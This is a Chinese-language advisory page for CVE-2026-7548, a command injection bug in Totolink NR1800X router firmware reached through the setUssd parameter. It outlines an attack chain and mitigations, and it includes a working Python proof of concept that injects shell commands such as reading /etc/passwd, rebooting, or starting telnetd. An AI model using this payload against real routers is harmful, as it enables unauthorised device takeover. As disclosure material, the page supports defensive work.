CVE-2026-7548 CVSS 8.8 高危

CVE-2026-7548 Totolink NR1800X命令注入漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7548

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink NR1800X

漏洞概述

Totolink NR1800X路由器固件版本9.1.0u.6279_B20210910中存在高危安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的sub_41A68C函数未对用户输入进行有效过滤。攻击者可通过操纵setUssd参数执行恶意命令，导致远程命令注入。由于攻击无需复杂交互且权限要求较低，该漏洞对系统机密性、完整性和可用性构成极高威胁，且已有公开利用代码。

技术细节

该漏洞位于Totolink NR1800X路由器的Web管理接口/cgi-bin/cstecgi.cgi中。具体受影响的函数为sub_41A68C。在处理特定请求时，该函数直接获取用户提供的`setUssd`参数，并将其传递给后台系统命令执行函数（如system()或popen()）而未进行任何安全过滤或转义。这使得攻击者能够构造包含Shell元字符（如`;`, `|`, `&`等）的恶意载荷。当设备解析该参数时，会将恶意拼接的字符串作为操作系统命令执行。由于该接口通常需要低权限认证（PR:L），且监听在网络接口（AV:N），经过认证的攻击者可远程发送特制的HTTP POST请求，从而在目标设备上获取Shell权限，完全控制设备。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行Totolink NR1800X且固件版本为9.1.0u.6279_B20210910的目标设备。

STEP 2

2. 获取低权限账号

攻击者通过弱口令猜测或默认凭证获取设备的低权限用户账号（PR:L）。

STEP 3

3. 构造恶意请求

攻击者利用获取的凭证，向/cgi-bin/cstecgi.cgi发送特制的POST请求，在setUssd参数中注入Shell命令。

STEP 4

4. 命令执行

服务器端未过滤特殊字符，将注入的参数传递给系统函数执行，攻击者获得设备控制权。

STEP 5

5. 持久化控制

攻击者可能写入后门程序或修改配置，实现对设备的长期控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://<target_ip>/cgi-bin/cstecgi.cgi"

# Vulnerable payload: command injection via setUssd
# Example payload: `;reboot` or `;telnetd -p 2323`
payload = {
    "function": "setUssd",
    "setUssd": ";cat /etc/passwd > /tmp/pwned"
}

# Headers might be required depending on the device configuration
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
}

try:
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, json=payload, headers=headers, timeout=5)
    
    # Check if the request was sent (vulnerable devices might not return clear error)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Totolink NR1800X 9.1.0u.6279_B20210910

防御指南

临时缓解措施

建议立即检查设备固件版本，如果存在漏洞，应尽快断开设备外网连接并进行固件升级。在无法立即升级的情况下，应通过防火墙规则严格限制对管理端口（通常为80/443）的访问源地址，仅允许管理员IP连接，并强制更改默认密码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7548
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7548
3 Details https://www.cvedetails.com/cve/CVE-2026-7548/
4 VulDB https://vuldb.com/cve/CVE-2026-7548
5 Link https://github.com/newym/cve/blob/main/totolink%20nr1800x%20command%20injection.md
6 Link https://vuldb.com/submit/804417
7 Link https://vuldb.com/vuln/360358
8 Link https://vuldb.com/vuln/360358/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表